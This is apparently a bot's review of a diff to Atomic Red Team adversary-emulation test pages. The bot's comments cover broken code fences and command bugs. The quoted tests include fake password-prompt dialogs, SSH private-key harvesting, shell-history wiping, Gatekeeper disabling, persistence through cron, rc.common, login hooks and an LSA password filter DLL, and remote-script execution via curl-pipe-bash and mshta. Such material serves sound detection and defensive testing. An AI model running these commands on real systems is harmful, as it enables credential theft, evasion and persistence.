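Review bot: the certutil encode/decode pair loses its code block because the fence is on the heading line. Restore the fence.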
@@ -47,8 +46,7 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
|------|-------------|------|---------------|
| executable | name of executable/file to decode | path | c:\file.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
```
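Review bot: besides the merged fence, `%temp%tcm.tmp` lacks a path separator after `%temp%`, so the copy lands beside the Temp directory (as `...\Temptcm.tmp`) rather than inside it; the path should include the separator. The doubled backslashes in `%windir%\\system32\\certutil.exe` are tolerated by cmd but are inconsistent with the other tests in this file.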
diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md
index f0e57adc..0ef81bf2 100644
--- a/atomics/T1141/T1141.md
+++ b/atomics/T1141/T1141.md
@@ -20,8 +20,7 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
```
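Review bot: the fence is merged into the heading, which matters more here than elsewhere because the long osascript line contains `&`, `""` and `'...'` that markdown will mangle once it is not in a code block. Also, `tell app "System Preferences" to activate` appears twice in a row; one copy is enough.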
@@ -35,8 +34,7 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;}
```
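Review bot: fence regression: the `powershell.exe -command {...}` line falls out of the code block, and the `{ ... }` and `$cred` inside it will render as prose. Put the fence on its own line.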
diff --git a/atomics/T1142/T1142.md b/atomics/T1142/T1142.md
index 92e64cf0..c17dc5e0 100644
--- a/atomics/T1142/T1142.md
+++ b/atomics/T1142/T1142.md
@@ -27,8 +27,7 @@ To manage their credentials, users have to use additional credentials to access
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
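Review bot: the three `security` commands drop out of the code block because of the merged fence; separately, `security import /tmp/certs.pem -k` ends with `-k` but no keychain path, so that line errors as written. Both need fixing.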
diff --git a/atomics/T1144/T1144.md b/atomics/T1144/T1144.md
index 38d30726..9f3bd167 100644
--- a/atomics/T1144/T1144.md
+++ b/atomics/T1144/T1144.md
@@ -24,8 +24,7 @@ Gatekeeper Bypass via command line
|------|-------------|------|---------------|
| app_path | Path to app to be used | Path | myapp.app|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
```
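Review bot: with the fence appended to the heading, `sudo xattr -r -d com.apple.quarantine #{app_path}` and `sudo spctl --master-disable` render as running text, and the closing fence then opens an unclosed block. Restore the fence line.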
diff --git a/atomics/T1145/T1145.md b/atomics/T1145/T1145.md
index ca7e31da..61780990 100644
--- a/atomics/T1145/T1145.md
+++ b/atomics/T1145/T1145.md
@@ -29,8 +29,7 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
echo "ATOMICREDTEAM" > %windir%\cert.key
dir c:\ /b /s .key | findstr /e .key
```
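Review bot: the fence is on the heading line, so the `echo` and `dir ... | findstr` lines lose code formatting. Note also that the test writes `cert.key` into `%windir%` and nothing removes it; a cleanup step would leave the host as it was found.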
@@ -48,8 +47,7 @@ Discover private SSH keys on a macOS or Linux system.
|------|-------------|------|---------------|
| output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
find / -name id_rsa >> #{output_file}
find / -name id_dsa >> #{output_file}
```
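Review bot: the two `find / -name ... >> #{output_file}` lines are no longer a code block after the fence was appended to the heading; `>>` outside a code span is easy to misread. Restore the fence.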
@@ -67,8 +65,7 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma
|------|-------------|------|---------------|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir #{output_folder}
find / -name id_rsa -exec cp --parents {} #{output_folder} \;
find / -name id_dsa -exec cp --parents {} #{output_folder} \;
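Review bot: fence regression; the `find / -name id_rsa -exec cp --parents {} #{output_folder} \;` lines end in `\;`, which markdown treats as an escape once the text is outside a code block (rendering a bare `;`), so the displayed command is wrong. The hunk also ends inside the block.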
@@ -87,8 +84,7 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the `
|------|-------------|------|---------------|
| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir #{output_folder}
find / -name id_rsa -exec rsync -R {} #{output_folder} \;
find / -name id_dsa -exec rsync -R {} #{output_folder} \;
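Review bot: same as the cp variant: with the fence merged into the heading, `\;` at the end of each `find ... -exec rsync -R {} #{output_folder} \;` line renders as a bare `;`. Keep the fence on its own line.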
diff --git a/atomics/T1146/T1146.md b/atomics/T1146/T1146.md
index 30302a12..8a928645 100644
--- a/atomics/T1146/T1146.md
+++ b/atomics/T1146/T1146.md
@@ -25,8 +25,7 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm ~/.bash_history
```
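Review bot: fence folded into the heading; `rm ~/.bash_history` is left as text. The generator template has lost its newline.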
@@ -38,8 +37,7 @@ Clears bash history via rm
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "" > ~/.bash_history
```
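Review bot: same newline loss; `echo "" > ~/.bash_history` needs its fence line.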
@@ -51,8 +49,7 @@ Clears bash history via cat /dev/null
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cat /dev/null > ~/.bash_history
```
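Review bot: fence merged into heading; `cat /dev/null > ~/.bash_history` drops out of the code block.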
@@ -64,8 +61,7 @@ Clears bash history via a symlink to /dev/null
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ln -sf /dev/null ~/.bash_history
```
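Review bot: fence regression for `ln -sf /dev/null ~/.bash_history`; restore the separate fence line.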
@@ -77,8 +73,7 @@ Clears bash history via truncate
**Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
truncate -s0 ~/.bash_history
```
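Review bot: `truncate -s0 ~/.bash_history` loses its code block because ``` is appended to the heading.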
@@ -90,8 +85,7 @@ Clears the history of a bunch of different shell types by setting the history si
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
unset HISTFILE
export HISTFILESIZE=0
history -c
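Review bot: the fence is appended to the heading, so `unset HISTFILE`, `export HISTFILESIZE=0` and `history -c` render as prose; the hunk ends inside the block, so the following lines are affected too. Keep the fence on its own line.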
diff --git a/atomics/T1147/T1147.md b/atomics/T1147/T1147.md
index b70b2c8a..bf4d0884 100644
--- a/atomics/T1147/T1147.md
+++ b/atomics/T1147/T1147.md
@@ -20,8 +20,7 @@ Add a hidden user on MacOS
|------|-------------|------|---------------|
| user_name | username to add | string | APT|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo dscl . -create /Users/#{user_name} UniqueID 333
```
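Review bot: fence merged into the heading; `sudo dscl . -create /Users/#{user_name} UniqueID 333` renders as text. Restore the fence line.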
diff --git a/atomics/T1148/T1148.md b/atomics/T1148/T1148.md
index f91f71ff..898b2636 100644
--- a/atomics/T1148/T1148.md
+++ b/atomics/T1148/T1148.md
@@ -22,8 +22,7 @@ Disables history collection in shells
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
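Review bot: besides the merged fence, `ls #{evil_command}` with the default `whoami` lists a path named `whoami` rather than running anything, so the test never executes the command the `evil_command` input describes; the description should match what the line actually does.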
@@ -36,8 +35,7 @@ xxx
**Supported Platforms:** macOS, Linux
-#### Run it with these steps!
-1. export HISTCONTROL=ignoreboth
+#### Run it with these steps! 1. export HISTCONTROL=ignoreboth
2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
3. ls
4. whoami > recon.txt
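Review bot: `1. export HISTCONTROL=ignoreboth` is merged into the heading, so step 1 becomes heading text and the list renders starting at `2.`; also, `xxx` in the hunk context suggests the test description was never filled in.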
diff --git a/atomics/T1150/T1150.md b/atomics/T1150/T1150.md
index dd7c9b94..66a2ae33 100644
--- a/atomics/T1150/T1150.md
+++ b/atomics/T1150/T1150.md
@@ -16,8 +16,7 @@ Modify MacOS plist file in one of two directories
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Modify a .plist in
+#### Run it with these steps! 1. Modify a .plist in
/Library/Preferences
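Review bot: step 1 (`1. Modify a .plist in`) is pulled onto the heading line, leaving `/Library/Preferences` as an orphaned line below the heading. The steps list must start on its own line.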
diff --git a/atomics/T1151/T1151.md b/atomics/T1151/T1151.md
index d8b93332..2d783174 100644
--- a/atomics/T1151/T1151.md
+++ b/atomics/T1151/T1151.md
@@ -17,8 +17,7 @@ Space After Filename
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
+#### Run it with these steps! 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
2. mv execute.txt "execute.txt "
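Review bot: the heading swallows step 1, which here is the long `echo '#!/bin/bash\n...' > execute.txt && chmod +x execute.txt` command; as heading text its backslashes and quotes will be mangled, and only `2. mv execute.txt "execute.txt "` remains as a list item. Keep the step list separate from the heading.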
diff --git a/atomics/T1152/T1152.md b/atomics/T1152/T1152.md
index 79b0ace6..c3f45a96 100644
--- a/atomics/T1152/T1152.md
+++ b/atomics/T1152/T1152.md
@@ -17,8 +17,7 @@ Utilize launchctl
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
```
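Review bot: fence folded into the heading; `launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator` renders as text.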
diff --git a/atomics/T1153/T1153.md b/atomics/T1153/T1153.md
index b3acc2e5..7e727d4d 100644
--- a/atomics/T1153/T1153.md
+++ b/atomics/T1153/T1153.md
@@ -19,8 +19,7 @@ Creates a script and executes it using the source command
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
chmod +x /tmp/art.sh
source /tmp/art.sh
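Review bot: besides the merged fence (the hunk also ends inside the block), the executor is declared as `sh` but the last line uses `source`, a bash/zsh builtin that POSIX sh does not provide; the sibling test that uses `.` is the portable one, so this one should declare `bash` or be marked shell-specific.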
@@ -34,8 +33,7 @@ Creates a script and executes it using the source command's dot alias
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
chmod +x /tmp/art.sh
. /tmp/art.sh
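Review bot: fence regression: the three lines ending in `. /tmp/art.sh` drop out of the code block. Restore the fence line.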
diff --git a/atomics/T1154/T1154.md b/atomics/T1154/T1154.md
index ba1a1319..77f82572 100644
--- a/atomics/T1154/T1154.md
+++ b/atomics/T1154/T1154.md
@@ -17,8 +17,7 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
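Review bot: the fence appended to the heading takes the `trap ... EXIT` / `exit` / `trap ... INT` lines out of the code block. Separately, `exit` on the second line terminates the shell (firing the EXIT trap) before the INT trap on the third line is ever installed, so when these lines run as one script the keyboard-interrupt path the context describes never executes.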
diff --git a/atomics/T1155/T1155.md b/atomics/T1155/T1155.md
index 08cefc48..cd8c0306 100644
--- a/atomics/T1155/T1155.md
+++ b/atomics/T1155/T1155.md
@@ -22,8 +22,7 @@ https://github.com/EmpireProject/Empire
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &""
```
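Review bot: with the fence merged into the heading the `osascript "do shell script "echo ..."` line becomes prose; independent of that, the nested double quotes on that line are not escaped, so the shell sees `osascript "do shell script "` followed by bare words and the command cannot be what was intended.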
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md
index 1d81f042..f0fae3f9 100644
--- a/atomics/T1156/T1156.md
+++ b/atomics/T1156/T1156.md
@@ -26,8 +26,7 @@ Adds a command to the .bash_profile file of the current user
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "#{command_to_add}" >> ~/.bash_profile
```
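Review bot: fence folded into the heading; `echo "#{command_to_add}" >> ~/.bash_profile` renders as text.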
@@ -44,8 +43,7 @@ Adds a command to the .bashrc file of the current user
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo "#{command_to_add}" >> ~/.bashrc
```
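Review bot: same for the .bashrc variant; the fence needs its own line.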
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index f74d5e1c..18029818 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -52,8 +52,7 @@ Creates a hidden file inside a hidden directory
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
```
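Review bot: the `mkdir .hidden-directory` / `echo ... > .hidden-directory/.hidden-file` pair loses its code block because the fence is on the heading line.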
@@ -66,8 +65,7 @@ Hide a file on MacOS
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
```
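Review bot: apart from the merged fence, `2>&1 /dev/null` does not discard anything: `2>&1` duplicates stderr onto stdout and `/dev/null` is then passed to `xattr` as one more path to scan. `2>/dev/null` was presumably intended. Also `*` and `/` are both given as paths, so the recursive scan of `/` already covers `*`.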
@@ -85,8 +83,7 @@ mv file to a .file
| filename | path of file to hide | path | /tmp/evil|
| output_filename | output path of file | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mv #(unknown) .#{output_filename}
```
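Review bot: beyond the merged fence, `.#{output_filename}` with the table default `/tmp/evil` expands to `./tmp/evil`, a relative path under the current directory, not the dot-file the context ("mv file to a .file") describes; the default or the placeholder form needs adjusting. Both inputs also default to the same path.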
@@ -103,8 +100,7 @@ Creates a file and marks it as a system file using the attrib.exe utility.
|------|-------------|------|---------------|
| filename | path of file to mark as system | path | C:\Windows\Temp\sensitive_file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
attrib.exe +s #(unknown)
```
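Review bot: fence folded into the heading; `attrib.exe +s ...` is left as text. The context says the test creates the file, but the block only sets the attribute on an existing path.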
@@ -121,8 +117,7 @@ Creates a file and marks it as hidden using the attrib.exe utility.
|------|-------------|------|---------------|
| filename | path of file to mark as hidden | path | C:\Windows\Temp\sensitive_file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
attrib.exe +h #(unknown)
```
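Review bot: same two issues as the +s test: merged fence, and the context says the file is created while only `attrib.exe +h` runs.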
@@ -139,8 +134,7 @@ Requires Apple Dev Tools
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
setfile -a V #(unknown)
```
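Review bot: fence appended to heading; `setfile -a V ...` renders as text.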
@@ -157,8 +151,7 @@ Hide a directory on MacOS
|------|-------------|------|---------------|
| filename | path of file to hide | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
chflags hidden #(unknown)
```
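Review bot: fence regression for `chflags hidden ...`; also the context says "Hide a directory" while the input row says "path of file to hide", so one of them should change.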
@@ -170,8 +163,7 @@ Show all hidden files on MacOS
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
defaults write com.apple.finder AppleShowAllFiles YES
```
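Review bot: merged fence; in addition, `defaults write com.apple.finder AppleShowAllFiles YES` only takes effect once Finder is relaunched, which the block does not do, so someone running this to check the preceding hide tests will see no change. Worth a note in the description.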
@@ -183,8 +175,7 @@ Create visible directories on MacOS and Linux
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir visible-directory
echo "this file is visible" > visible-directory/visible-file
ls
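Review bot: fence folded into the heading; `mkdir visible-directory`, the echo and `ls` are no longer in a code block, and the hunk ends inside it.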
@@ -199,8 +190,7 @@ Create hidden directories and files on Nix platforms
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
ls -la
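Review bot: same regression; note this `.hidden-directory` block duplicates the earlier "Creates a hidden file inside a hidden directory" test in this file apart from the trailing `ls -la`.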
@@ -221,8 +211,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
| file_name | File name of file to create ADS on. | string | test.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
echo "test" > #{file_name}:#{ads_filename}
echo "test" > :#{ads_filename}
dir /s /r | find ":$DATA"
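Review bot: merged fence; outside a code block `#{file_name}:#{ads_filename}` and `find ":$DATA"` render as text, and `$DATA` is easy to misread. The hunk ends inside the block.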
@@ -242,8 +231,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
| file_name | File name of file to create ADS on. | string | test.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
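Review bot: beyond the merged fence, the first PowerShell line redirects `echo "test"` to `#{file_name}` and then pipes nothing into `set-content -path test.txt ...` with the path hard-coded instead of `#{file_name}`; the second line already does the same write with the placeholder, so the first line is both redundant and inconsistent.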
diff --git a/atomics/T1159/T1159.md b/atomics/T1159/T1159.md
index fbdfa811..c6719a73 100644
--- a/atomics/T1159/T1159.md
+++ b/atomics/T1159/T1159.md
@@ -17,8 +17,7 @@ Create a plist and execute it
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Create file - .client
+#### Run it with these steps! 1. Create file - .client
2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
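Review bot: step `1. Create file - .client` is merged into the heading, leaving only step 2 as a list item.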
diff --git a/atomics/T1160/T1160.md b/atomics/T1160/T1160.md
index 6c5f7fb5..b68acc20 100644
--- a/atomics/T1160/T1160.md
+++ b/atomics/T1160/T1160.md
@@ -19,8 +19,7 @@ Utilize LaunchDaemon to launch `Hello World`
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
+#### Run it with these steps! 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
2.
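Review bot: step 1 is folded into the heading, and the remaining `2.` is an empty list item; the plist the step refers to ("the following file") is not in the hunk, so the list should be re-checked once the newline is restored.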
diff --git a/atomics/T1163/T1163.md b/atomics/T1163/T1163.md
index fa796830..576f6f10 100644
--- a/atomics/T1163/T1163.md
+++ b/atomics/T1163/T1163.md
@@ -19,8 +19,7 @@ Modify rc.common
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
```
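Review bot: with the fence on the heading line the `echo osascript ... >> /etc/rc.common` command is rendered as text. Separately, the single quotes are consumed by the shell running `echo`, so what is appended to rc.common is not the quoted line shown, and appending to /etc/rc.common needs root, which the block does not request.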
diff --git a/atomics/T1164/T1164.md b/atomics/T1164/T1164.md
index 60fc1e91..9b572276 100644
--- a/atomics/T1164/T1164.md
+++ b/atomics/T1164/T1164.md
@@ -21,8 +21,7 @@ Plist Method
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. create a custom plist:
+#### Run it with these steps! 1. create a custom plist:
~/Library/Preferences/com.apple.loginwindow.plist
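Review bot: `1. create a custom plist:` is merged into the heading, leaving `~/Library/Preferences/com.apple.loginwindow.plist` as a bare line under it.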
@@ -47,8 +46,7 @@ Mac Defaults
|------|-------------|------|---------------|
| script | path to script | path | /path/to/script|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo defaults write com.apple.loginwindow LoginHook #{script}
sudo defaults delete com.apple.loginwindow LoginHook
```
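Review bot: fence merged into heading; in addition, `sudo defaults delete com.apple.loginwindow LoginHook` immediately removes the hook the previous line wrote, so the test never leaves the state a detection would fire on. The delete belongs in cleanup.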
diff --git a/atomics/T1165/T1165.md b/atomics/T1165/T1165.md
index 2d5f7e50..bd9b8467 100644
--- a/atomics/T1165/T1165.md
+++ b/atomics/T1165/T1165.md
@@ -21,8 +21,7 @@ Modify or create an file in StartupItems
**Supported Platforms:** macOS
-#### Run it with these steps!
-1. /Library/StartupItems/StartupParameters.plist
+#### Run it with these steps! 1. /Library/StartupItems/StartupParameters.plist
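Review bot: the only step, `1. /Library/StartupItems/StartupParameters.plist`, is folded into the heading, so after this change the section has a heading and no steps at all.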
@@ -39,8 +38,7 @@ Establish persistence via a rule run by emond daemon at startup, based on https:
|------|-------------|------|---------------|
| plist | Path to emond plist file | path | /path/to/T1165_emond.plist|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist
sudo touch /private/var/db/emondClients/T1165
#Clean up
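Review bot: fence regression; the `sudo cp "#{plist}" /etc/emond.d/rules/...` and `sudo touch ...` lines fall out of the code block, and the `#Clean up` marker shows the hunk ends mid-block.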
diff --git a/atomics/T1166/T1166.md b/atomics/T1166/T1166.md
index 6048cc50..2837d6fe 100644
--- a/atomics/T1166/T1166.md
+++ b/atomics/T1166/T1166.md
@@ -26,8 +26,7 @@ Setuid and Setgid
|------|-------------|------|---------------|
| payload | hello.c payload | path | hello.c|
-#### Run it with these steps!
-1. make hello
+#### Run it with these steps! 1. make hello
2. sudo chown root hello
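Review bot: `1. make hello` is merged into the heading; the list starts at `2. sudo chown root hello`.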
@@ -50,8 +49,7 @@ This test sets the SetUID flag on a file in Linux and macOS.
|------|-------------|------|---------------|
| file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo chown root #{file_to_setuid}
sudo chmod u+s #{file_to_setuid}
```
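Review bot: fence folded into the heading around the `chown` / `chmod u+s` pair.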
@@ -69,8 +67,7 @@ This test sets the SetGID flag on a file in Linux and macOS.
|------|-------------|------|---------------|
| file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo chown root #{file_to_setuid}
sudo chmod g+s #{file_to_setuid}
```
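Review bot: merged fence; also the input is named `file_to_setuid` in a SetGID test, which will mislead anyone grepping the inputs.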
diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md
index 0010420e..8ce66670 100644
--- a/atomics/T1168/T1168.md
+++ b/atomics/T1168/T1168.md
@@ -39,8 +39,7 @@ This test replaces the current user's crontab file with the contents of the refe
| command | Command to execute | string | /tmp/evil.sh|
| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
```
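Review bot: fence regression for the `echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}` line; note that `crontab #{tmp_cron}` replaces the user's existing crontab without saving it, so the test should snapshot it for cleanup.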
@@ -58,8 +57,7 @@ This test adds a script to a cron folder configured to execute on a schedule. Th
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in cron folder | string | persistevil|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
```
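Review bot: fence merged into heading; `echo "#{command}" > /etc/cron.daily/#{cron_script_name}` renders as text. The write into /etc/cron.daily needs root and nothing removes the file afterwards.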
@@ -71,8 +69,7 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with these steps!
-1. Place this file in /etc/emond.d/rules/atomicredteam.plist
+#### Run it with these steps! 1. Place this file in /etc/emond.d/rules/atomicredteam.plist
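Review bot: `1. Place this file in /etc/emond.d/rules/atomicredteam.plist` is merged into the heading, and the hunk shows no file content after it; the Supported Platforms line also lists CentOS/Ubuntu/Linux for a test built on the macOS-only emond daemon.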
diff --git a/atomics/T1169/T1169.md b/atomics/T1169/T1169.md
index 7cd300a2..4cada5f5 100644
--- a/atomics/T1169/T1169.md
+++ b/atomics/T1169/T1169.md
@@ -17,8 +17,7 @@ Common Sudo enumeration methods.
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sudo -l
sudo su
cat /etc/sudoers
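Review bot: beyond the merged fence, `sudo su` in the middle of an enumeration block opens an interactive root shell, which hangs a non-interactive runner and enumerates nothing; `sudo -l` and `cat /etc/sudoers` are the enumeration commands here.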
diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index c5a7cedf..be3c4d5a 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -28,8 +28,7 @@ Test execution of a remote script using mshta.exe
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
```
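Review bot: fence folded into heading; the `mshta.exe javascript:...` line then renders as prose and its parentheses and semicolons are hard to read.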
diff --git a/atomics/T1173/T1173.md b/atomics/T1173/T1173.md
index f5d4a7f9..3b19fafd 100644
--- a/atomics/T1173/T1173.md
+++ b/atomics/T1173/T1173.md
@@ -19,8 +19,7 @@ Executes commands via DDE using Microsfot Word
**Supported Platforms:** Windows
-#### Run it with these steps!
-Open Microsoft Word
+#### Run it with these steps! Open Microsoft Word
Insert tab -> Quick Parts -> Field
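Review bot: `Open Microsoft Word` is merged into the heading, and the steps here carry no list markers at all (compare T1137). Also `Microsfot` in the hunk context is a typo.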
diff --git a/atomics/T1174/T1174.md b/atomics/T1174/T1174.md
index 5f8be027..496da46b 100644
--- a/atomics/T1174/T1174.md
+++ b/atomics/T1174/T1174.md
@@ -24,8 +24,7 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot
|------|-------------|------|---------------|
| input_dll | Path to DLL to be installed and registered | Path | C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
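Review bot: the fence is merged into the heading, so the PowerShell lines beginning `$passwordFilterName = ...` render as text (the `$` and quoted fragments will be mangled); the hunk ends mid-block, so the whole script is affected.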
diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md
index 5ee85808..23df705a 100644
--- a/atomics/T1176/T1176.md
+++ b/atomics/T1176/T1176.md
@@ -21,8 +21,7 @@ xxx
**Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to [chrome://extensions](chrome://extensions) and
+#### Run it with these steps! 1. Navigate to [chrome://extensions](chrome://extensions) and
tick 'Developer Mode'.
2. Click 'Load unpacked extension...' and navigate to
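Review bot: `1. Navigate to [chrome://extensions](chrome://extensions) and` is merged into the heading, which leaves `tick 'Developer Mode'.` as an orphan line and the list starting at 2.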
@@ -40,8 +39,7 @@ xxx
**Supported Platforms:** Linux, Windows, macOS
-#### Run it with these steps!
-1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
